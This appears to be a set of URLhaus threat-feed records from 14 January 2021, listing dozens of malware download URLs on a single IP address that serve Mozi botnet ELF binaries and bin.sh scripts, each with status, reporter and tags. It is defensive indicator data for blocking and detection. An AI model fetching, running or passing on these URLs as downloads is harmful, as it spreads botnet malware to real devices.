+{"id":"961121","urlhaus_reference":"https://urlhaus.abuse.ch/url/961121/","url":"http://89.160.20.156:52015/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961118","urlhaus_reference":"https://urlhaus.abuse.ch/url/961118/","url":"http://89.160.20.156:42987/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961119","urlhaus_reference":"https://urlhaus.abuse.ch/url/961119/","url":"http://89.160.20.156:53388/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961120","urlhaus_reference":"https://urlhaus.abuse.ch/url/961120/","url":"http://89.160.20.156:44124/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961115","urlhaus_reference":"https://urlhaus.abuse.ch/url/961115/","url":"http://89.160.20.156:33802/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961116","urlhaus_reference":"https://urlhaus.abuse.ch/url/961116/","url":"http://89.160.20.156:43806/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:37:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961117","urlhaus_reference":"https://urlhaus.abuse.ch/url/961117/","url":"http://89.160.20.156:52278/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961114","urlhaus_reference":"https://urlhaus.abuse.ch/url/961114/","url":"http://89.160.20.156:41202/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961113","urlhaus_reference":"https://urlhaus.abuse.ch/url/961113/","url":"http://89.160.20.156:35756/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961112","urlhaus_reference":"https://urlhaus.abuse.ch/url/961112/","url":"http://89.160.20.156:40569/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961111","urlhaus_reference":"https://urlhaus.abuse.ch/url/961111/","url":"http://89.160.20.156:47645/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961110","urlhaus_reference":"https://urlhaus.abuse.ch/url/961110/","url":"http://89.160.20.156:40023/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961109","urlhaus_reference":"https://urlhaus.abuse.ch/url/961109/","url":"http://89.160.20.156:53402/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:34:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961108","urlhaus_reference":"https://urlhaus.abuse.ch/url/961108/","url":"http://89.160.20.156:36316/bin.sh","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:29:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961107","urlhaus_reference":"https://urlhaus.abuse.ch/url/961107/","url":"http://89.160.20.156:48105/bin.sh","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:28:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961103","urlhaus_reference":"https://urlhaus.abuse.ch/url/961103/","url":"http://89.160.20.156:40017/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961104","urlhaus_reference":"https://urlhaus.abuse.ch/url/961104/","url":"http://89.160.20.156:41906/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:21:04 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961105","urlhaus_reference":"https://urlhaus.abuse.ch/url/961105/","url":"http://89.160.20.156:38607/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961106","urlhaus_reference":"https://urlhaus.abuse.ch/url/961106/","url":"http://89.160.20.156:59331/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961102","urlhaus_reference":"https://urlhaus.abuse.ch/url/961102/","url":"http://89.160.20.156:53932/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:20:24 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961101","urlhaus_reference":"https://urlhaus.abuse.ch/url/961101/","url":"http://89.160.20.156:58385/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961099","urlhaus_reference":"https://urlhaus.abuse.ch/url/961099/","url":"http://89.160.20.156:57010/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961100","urlhaus_reference":"https://urlhaus.abuse.ch/url/961100/","url":"http://89.160.20.156:59715/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961094","urlhaus_reference":"https://urlhaus.abuse.ch/url/961094/","url":"http://89.160.20.156:57052/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961095","urlhaus_reference":"https://urlhaus.abuse.ch/url/961095/","url":"http://89.160.20.156:60550/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961096","urlhaus_reference":"https://urlhaus.abuse.ch/url/961096/","url":"http://89.160.20.156:39684/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961097","urlhaus_reference":"https://urlhaus.abuse.ch/url/961097/","url":"http://89.160.20.156:43593/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961098","urlhaus_reference":"https://urlhaus.abuse.ch/url/961098/","url":"http://89.160.20.156:36066/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:20:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961093","urlhaus_reference":"https://urlhaus.abuse.ch/url/961093/","url":"http://89.160.20.156:35006/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:19:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961091","urlhaus_reference":"https://urlhaus.abuse.ch/url/961091/","url":"http://89.160.20.156:38184/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961092","urlhaus_reference":"https://urlhaus.abuse.ch/url/961092/","url":"http://89.160.20.156:59027/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961090","urlhaus_reference":"https://urlhaus.abuse.ch/url/961090/","url":"http://89.160.20.156:50639/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961086","urlhaus_reference":"https://urlhaus.abuse.ch/url/961086/","url":"http://89.160.20.156:33534/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961087","urlhaus_reference":"https://urlhaus.abuse.ch/url/961087/","url":"http://89.160.20.156:36316/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961088","urlhaus_reference":"https://urlhaus.abuse.ch/url/961088/","url":"http://89.160.20.156:47120/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961089","urlhaus_reference":"https://urlhaus.abuse.ch/url/961089/","url":"http://89.160.20.156:46287/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961085","urlhaus_reference":"https://urlhaus.abuse.ch/url/961085/","url":"http://89.160.20.156:39536/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:14:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961083","urlhaus_reference":"https://urlhaus.abuse.ch/url/961083/","url":"http://89.160.20.156:40689/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:07:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961084","urlhaus_reference":"https://urlhaus.abuse.ch/url/961084/","url":"http://89.160.20.156:51123/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:07:08 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961082","urlhaus_reference":"https://urlhaus.abuse.ch/url/961082/","url":"http://89.160.20.156:52540/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961081","urlhaus_reference":"https://urlhaus.abuse.ch/url/961081/","url":"http://89.160.20.156:56964/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961078","urlhaus_reference":"https://urlhaus.abuse.ch/url/961078/","url":"http://89.160.20.156:57120/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961079","urlhaus_reference":"https://urlhaus.abuse.ch/url/961079/","url":"http://89.160.20.156:44518/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961080","urlhaus_reference":"https://urlhaus.abuse.ch/url/961080/","url":"http://89.160.20.156:50389/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961077","urlhaus_reference":"https://urlhaus.abuse.ch/url/961077/","url":"http://89.160.20.156:34335/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961069","urlhaus_reference":"https://urlhaus.abuse.ch/url/961069/","url":"http://89.160.20.156:54865/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961070","urlhaus_reference":"https://urlhaus.abuse.ch/url/961070/","url":"http://89.160.20.156:50773/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961071","urlhaus_reference":"https://urlhaus.abuse.ch/url/961071/","url":"http://89.160.20.156:52005/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961072","urlhaus_reference":"https://urlhaus.abuse.ch/url/961072/","url":"http://89.160.20.156:56066/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961073","urlhaus_reference":"https://urlhaus.abuse.ch/url/961073/","url":"http://89.160.20.156:32915/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:06:04 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961074","urlhaus_reference":"https://urlhaus.abuse.ch/url/961074/","url":"http://89.160.20.156:43462/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961075","urlhaus_reference":"https://urlhaus.abuse.ch/url/961075/","url":"http://89.160.20.156:33291/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961076","urlhaus_reference":"https://urlhaus.abuse.ch/url/961076/","url":"http://89.160.20.156:1440/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961068","urlhaus_reference":"https://urlhaus.abuse.ch/url/961068/","url":"http://89.160.20.156:55907/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961066","urlhaus_reference":"https://urlhaus.abuse.ch/url/961066/","url":"http://89.160.20.156:33181/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961067","urlhaus_reference":"https://urlhaus.abuse.ch/url/961067/","url":"http://89.160.20.156:44691/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961059","urlhaus_reference":"https://urlhaus.abuse.ch/url/961059/","url":"http://89.160.20.156:55254/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961060","urlhaus_reference":"https://urlhaus.abuse.ch/url/961060/","url":"http://89.160.20.156:43010/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961061","urlhaus_reference":"https://urlhaus.abuse.ch/url/961061/","url":"http://89.160.20.156:37886/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961062","urlhaus_reference":"https://urlhaus.abuse.ch/url/961062/","url":"http://89.160.20.156:40153/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961063","urlhaus_reference":"https://urlhaus.abuse.ch/url/961063/","url":"http://89.160.20.156:34305/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:05:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961064","urlhaus_reference":"https://urlhaus.abuse.ch/url/961064/","url":"http://89.160.20.156:35653/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961065","urlhaus_reference":"https://urlhaus.abuse.ch/url/961065/","url":"http://89.160.20.156:48908/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961058","urlhaus_reference":"https://urlhaus.abuse.ch/url/961058/","url":"http://89.160.20.156:40035/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961055","urlhaus_reference":"https://urlhaus.abuse.ch/url/961055/","url":"http://89.160.20.156:54461/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961056","urlhaus_reference":"https://urlhaus.abuse.ch/url/961056/","url":"http://89.160.20.156:51991/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961057","urlhaus_reference":"https://urlhaus.abuse.ch/url/961057/","url":"http://89.160.20.156:41143/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]}
+{"id":"961054","urlhaus_reference":"https://urlhaus.abuse.ch/url/961054/","url":"http://89.160.20.156:51095/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:02:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]}
+{"id":"961053","urlhaus_reference":"https://urlhaus.abuse.ch/url/961053/","url":"http://89.160.20.156:36558/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961050","urlhaus_reference":"https://urlhaus.abuse.ch/url/961050/","url":"http://89.160.20.156:47548/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961051","urlhaus_reference":"https://urlhaus.abuse.ch/url/961051/","url":"http://89.160.20.156:35796/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961052","urlhaus_reference":"https://urlhaus.abuse.ch/url/961052/","url":"http://89.160.20.156:42765/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961048","urlhaus_reference":"https://urlhaus.abuse.ch/url/961048/","url":"http://89.160.20.156:37388/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961049","urlhaus_reference":"https://urlhaus.abuse.ch/url/961049/","url":"http://89.160.20.156:56849/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961047","urlhaus_reference":"https://urlhaus.abuse.ch/url/961047/","url":"http://89.160.20.156:35574/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961046","urlhaus_reference":"https://urlhaus.abuse.ch/url/961046/","url":"http://89.160.20.156:46947/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961043","urlhaus_reference":"https://urlhaus.abuse.ch/url/961043/","url":"http://89.160.20.156:34452/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961044","urlhaus_reference":"https://urlhaus.abuse.ch/url/961044/","url":"http://89.160.20.156:33017/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961045","urlhaus_reference":"https://urlhaus.abuse.ch/url/961045/","url":"http://89.160.20.156:55061/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961040","urlhaus_reference":"https://urlhaus.abuse.ch/url/961040/","url":"http://89.160.20.156:50046/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961041","urlhaus_reference":"https://urlhaus.abuse.ch/url/961041/","url":"http://89.160.20.156:51960/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961042","urlhaus_reference":"https://urlhaus.abuse.ch/url/961042/","url":"http://89.160.20.156:42372/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961039","urlhaus_reference":"https://urlhaus.abuse.ch/url/961039/","url":"http://89.160.20.156:51592/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:49:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
